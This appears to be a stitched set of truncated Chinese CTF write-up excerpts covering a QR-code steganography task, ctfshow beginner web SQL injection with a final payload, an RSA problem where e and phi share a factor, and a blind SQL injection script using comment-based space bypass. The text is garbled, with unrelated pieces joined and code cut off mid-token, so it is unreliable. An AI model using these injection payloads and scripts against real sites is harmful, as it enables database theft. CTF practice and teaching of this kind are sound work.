打开靶机 下载完成后,为一张二维码图片 使用StegSolve 解出隐写图像 保存后使用PS或其他工具去除白边 然后使用脚本分割这个图像(25*25) from PIL import Image im = Image.open('solved.bmp') id = 0 for i in range(0, 25): for j in range(0, 25): box = (25 * i, 25 * j, 25 * (i + 1), 25 * (j + 1)) im.crop(box).resiz
ctfshow萌新 web1 1.手动注入.需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 2.找到?id=" "处有回显 3.注释掉后面的语句,得到flag 最终payload: ?id='1000'%23?sql=select * from article where id = '1000' order by id limit 1 web2-4 过滤规则: web2 web3 web4 过滤规则比上一题多了一些,这三个题目都可
题目如下: 题目分析: 拿到题,发现给的e不常规,p1和p2相等,有两个不同n,两个不同c和两个不同e.给定两个密文的情况下,通常需要找到两者之间存在的关系,"合并"密文求解才能得到正确的明文.先计算phi1和phi2,然后分别计算e和phi的gcd,发现都等于14,所以这里问题考察e和phi不互素情况下的求解. 1.已知存在如下数学公等式: 1 gcd(e,phi)=b 2 e = a * b 3 ed ≡ 1 mod phi 4 me ≡ c mod n 5 abd ≡ 1 m
打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'table=""for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "asc